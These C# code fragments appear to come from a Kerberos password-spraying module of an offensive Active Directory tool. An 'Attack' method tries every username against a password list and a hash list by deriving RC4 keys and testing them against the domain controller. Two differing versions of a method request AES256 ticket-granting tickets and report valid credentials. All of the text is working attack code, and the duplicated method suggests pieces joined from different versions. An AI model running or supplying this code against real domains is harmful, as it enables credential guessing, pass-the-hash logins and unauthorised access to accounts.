public bool Attack(string[] usernames, string[] passwords, string[] hashes) { bool success = false; foreach (string password in passwords) { foreach (string username in usernames) { string salt = String.Format("{0}{1}", domain.ToUpper(), username); // special case for computer account salts if (username.EndsWith("$")) { salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), username.TrimEnd('$').ToLower(), domain.ToLower()); } //best result with rc4 string hash = Crypto.KerberosPasswordHash(Interop.KERB_ETYPE.rc4_hmac, password, salt); if (this.TestUsernamePassword(username, hash, password, Interop.KERB_ETYPE.rc4_hmac)) { success = true; } } } foreach (string hash in hashes) { foreach (string username in usernames) { if (this.TestUsernamePassword(username, hash, "", Interop.KERB_ETYPE.rc4_hmac)) { success = true; } } } return(success); }
private void GetUsernamePasswordTGT(string username, string password) { Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1; string salt = String.Format("{0}{1}", domain.ToUpper(), username.ToLower()); string hash = Crypto.KerberosPasswordHash(encType, password, salt); byte[] TGT = Ask.InnerTGT(username, domain, hash, encType, false, this.dc); this.ReportValidPassword(username, password, TGT); }
private void GetUsernamePasswordTGT(string username, string password) { Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1; string salt = String.Format("{0}{1}", domain.ToUpper(), username.ToLower()); // special case for computer account salts if (username.EndsWith("$")) { salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), username.TrimEnd('$').ToLower(), domain.ToLower()); } string hash = Crypto.KerberosPasswordHash(encType, password, salt); AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType); byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc); this.ReportValidPassword(username, password, TGT); }